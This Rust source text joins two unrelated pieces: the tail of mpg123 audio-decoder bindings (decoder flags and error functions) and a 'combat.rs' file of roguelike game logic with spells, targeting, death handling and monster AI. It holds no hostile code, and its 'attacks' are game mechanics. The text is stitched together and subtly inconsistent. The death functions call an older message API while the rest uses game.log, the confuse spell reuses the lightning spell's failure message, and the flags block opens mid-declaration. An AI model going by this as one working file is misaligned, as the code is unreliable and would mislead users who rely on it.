/// Force 8bit formats.
const FLAG_FORCE_8BIT = 0x10,
/// Suppress any printouts (overrules verbose).
const FLAG_QUIET = 0x20,
/// Enable gapless decoding (default on if libmpg123 has
/// support).
const FLAG_GAPLESS = 0x40,
/// Disable resync stream after error.
const FLAG_NO_RESYNC = 0x80,
/// Enable small buffer on non-seekable streams to allow some
/// peek-ahead (for better MPEG sync).
const FLAG_SEEKBUFFER = 0x100,
/// Enable fuzzy seeks (guessing byte offsets or using
/// approximate seek points from Xing TOC)
const FLAG_FUZZY = 0x200,
/// Force floating point output (32 or 64 bits depends on
/// mpg123 internal precision).
const FLAG_FORCE_FLOAT = 0x400,
/// Do not translate ID3 text data to UTF-8. ID3 strings will
/// contain the raw text data, with the first byte containing
/// the ID3 encoding code.
const FLAG_PLAIN_ID3TEXT = 0x800,
/// Ignore any stream length information contained in the
/// stream, which can be contained in a 'TLEN' frame of an
/// ID3v2 tag or a Xing tag
const FLAG_IGNORE_STREAMLENGTH = 0x1000,
/// Do not parse ID3v2 tags, just skip them.
        const FLAG_SKIP_ID3V2 = 0x2000,
    }
}
// Error reporting.
extern "C" {
    pub fn mpg123_strerror(handle: *mut Mpg123Handle) -> *const c_char;
    pub fn mpg123_errcode(handle: *mut Mpg123Handle) -> Mpg123Error;
}
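// Illustrative sketch (not part of the original file): parameter flags combine
// like ordinary bitflags; `bits()` yields the raw value the C API expects.
fn _param_flags_demo() {
    let flags = FLAG_QUIET | FLAG_GAPLESS;
    assert!(flags.contains(FLAG_GAPLESS));
    assert_eq!(flags.bits(), 0x60);
}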
combat.rs
pub fn target_tile(tcod: &mut Tcod,
objects: &[Object], game: &mut Game,
max_range: Option<f32>)
-> Option<(i32, i32)> {
use tcod::input::KeyCode::Escape;
loop {
// render the screen. this erases the inventory and shows the names of
// objects under the mouse.
tcod.root.flush();
let event = input::check_for_event(input::KEY_PRESS | input::MOUSE).map(|e| e.1);
let mut key = None;
match event {
Some(Event::Mouse(m)) => tcod.mouse = m,
Some(Event::Key(k)) => key = Some(k),
None => {}
}
render_all(tcod, objects, game, false);
let (x, y) = (tcod.mouse.cx as i32, tcod.mouse.cy as i32);
// accept the target if the player clicked in FOV, and in case a range
// is specified, if it's in that range
let in_fov = (x < MAP_WIDTH) && (y < MAP_HEIGHT) && tcod.fov.is_in_fov(x, y);
let in_range = max_range.map_or(
true, |range| objects[PLAYER].distance(x, y) <= range);
if tcod.mouse.lbutton_pressed && in_fov && in_range {
return Some((x, y))
}
let escape = key.map_or(false, |k| k.code == Escape);
if tcod.mouse.rbutton_pressed || escape {
return None // cancel if the player right-clicked or pressed Escape
}
}
}
/// find closest enemy, up to a maximum range, and in the player's FOV
pub fn closest_monster(max_range: i32, objects: &mut [Object], tcod: &Tcod) -> Option<usize> {
let mut closest_enemy = None;
let mut closest_dist = (max_range + 1) as f32; // start with (slightly more than) maximum range
for (id, object) in objects.iter().enumerate() {
if (id != PLAYER) && object.fighter.is_some() && object.ai.is_some() &&
tcod.fov.is_in_fov(object.x, object.y)
{
// calculate distance between this object and the player
let dist = objects[PLAYER].distance_to(object);
if dist < closest_dist { // it's closer, so remember it
closest_enemy = Some(id);
closest_dist = dist;
}
}
}
closest_enemy
}
pub fn cast_fireball(_inventory_id: usize, objects: &mut [Object],game: &mut Game, tcod: &mut Tcod)
-> UseResult
{
// ask the player for a target tile to throw a fireball at
game.log.add("Left-click a target tile for the fireball, or right-click to cancel.",
colors::LIGHT_CYAN);
let (x, y) = match target_tile(tcod, objects, game, None) {
Some(tile_pos) => tile_pos,
None => return UseResult::Cancelled,
};
game.log.add(format!("The fireball explodes, burning everything within {} tiles!", FIREBALL_RADIUS),
colors::ORANGE);
let mut xp_to_gain = 0;
for (id, obj) in objects.iter_mut().enumerate() {
if obj.distance(x, y) <= FIREBALL_RADIUS as f32 && obj.fighter.is_some() {
game.log.add(format!("The {} gets burned for {} hit points.", obj.name, FIREBALL_DAMAGE),
colors::ORANGE);
if let Some(xp) = obj.take_damage(FIREBALL_DAMAGE, game) {
// Don't reward the player for burning themself!
if id != PLAYER {
xp_to_gain += xp;
}
}
}
}
objects[PLAYER].fighter.as_mut().unwrap().xp += xp_to_gain;
UseResult::UsedUp
}
pub fn cast_heal(_inventory_id: usize, objects: &mut [Object], game: &mut Game, _tcod: &mut Tcod)
-> UseResult
{
// heal the player
let player = &mut objects[PLAYER];
if let Some(fighter) = player.fighter {
if fighter.hp == player.max_hp(game) {
game.log.add("You are already at full health.", colors::RED);
return UseResult::Cancelled;
}
game.log.add("Your wounds start to feel better!", colors::LIGHT_VIOLET);
player.heal(HEAL_AMOUNT, game);
return UseResult::UsedUp;
}
UseResult::Cancelled
}
pub fn cast_lightning(_inventory_id: usize, objects: &mut [Object], game: &mut Game, tcod: &mut Tcod) -> UseResult
{
// find closest enemy (inside a maximum range) and damage it
let monster_id = closest_monster(LIGHTNING_RANGE, objects, tcod);
if let Some(monster_id) = monster_id {
// zap it!
game.log.add(format!("A lightning bolt strikes the {} with a loud thunder! \
The damage is {} hit points.",
objects[monster_id].name, LIGHTNING_DAMAGE),
colors::LIGHT_BLUE);
objects[monster_id].take_damage(LIGHTNING_DAMAGE, game);
UseResult::UsedUp
} else { // no enemy found within maximum range
game.log.add("No enemy is close enough to strike.", colors::RED);
UseResult::Cancelled
}
}
pub fn cast_confuse(_inventory_id: usize, objects: &mut [Object], game: &mut Game,tcod: &mut Tcod)
-> UseResult
{
// ask the player for a target to confuse
game.log.add("Left-click an enemy to confuse it, or right-click to cancel.", colors::LIGHT_CYAN);
let monster_id = target_monster(tcod, objects, game, Some(CONFUSE_RANGE as f32));
if let Some(monster_id) = monster_id {
let old_ai = objects[monster_id].ai.take().unwrap_or(Ai::Basic);
// replace the monster's AI with a "confused" one; after
// some turns it will restore the old AI
        objects[monster_id].ai = Some(Ai::Confused {
            previous_ai: Box::new(old_ai),
            num_turns: CONFUSE_NUM_TURNS,
        });
game.log.add(format!("The eyes of {} look vacant, as he starts to stumble around!",
objects[monster_id].name),
colors::LIGHT_GREEN);
UseResult::UsedUp
    } else { // no enemy found within maximum range
game.log.add("No enemy is close enough to strike.", colors::RED);
UseResult::Cancelled
}
}
pub fn player_death(player: &mut Object, messages: &mut Messages) {
// the game ended!
// TODO Replace with game.log.add()
message(messages, "You died!", colors::DARK_RED);
// for added effect, transform the player into a corpse!
player.char = CORPSE;
player.color = colors::DARK_RED;
}
pub fn monster_death(monster: &mut Object, messages: &mut Messages) {
// transform it into a nasty corpse! it doesn't block, can't be
// attacked and doesn't move
// TODO Replace with game.log.add()
// message(messages, format!("{} is dead!", monster.name), colors::ORANGE);
message(messages, format!("{} is dead! You gain {} experience points.",
monster.name, monster.fighter.unwrap().xp), colors::ORANGE);
monster.char = CORPSE;
monster.color = colors::DARK_RED;
monster.blocks = false;
monster.fighter = None;
monster.ai = None;
monster.name = format!("remains of {}", monster.name);
}
pub fn player_move_or_attack(dx: i32, dy: i32, objects: &mut [Object], game: &mut Game) {
// the coordinates the player is moving to/attacking
let x = objects[PLAYER].x + dx;
let y = objects[PLAYER].y + dy;
// try to find an attackable object there
let target_id = objects.iter().position(|object| {
object.fighter.is_some() && object.pos() == (x, y)
});
// attack if target found, move otherwise
match target_id {
Some(target_id) => {
let (player, target) = mut_two(PLAYER, target_id, objects);
player.attack(target, game);
}
None => {
move_by(PLAYER, dx, dy, &mut game.map, objects);
}
}
}
pub fn ai_take_turn(monster_id: usize, objects: &mut [Object], game: &mut Game, fov_map: &FovMap) {
use Ai::*;
if let Some(ai) = objects[monster_id].ai.take() {
let new_ai = match ai {
Basic => ai_basic(monster_id, game, objects, fov_map),
Confused{previous_ai, num_turns} => ai_confused(
monster_id, &mut game.map, objects, &mut game.log, previous_ai, num_turns)
};
        objects[monster_id].ai = Some(new_ai);
    }
}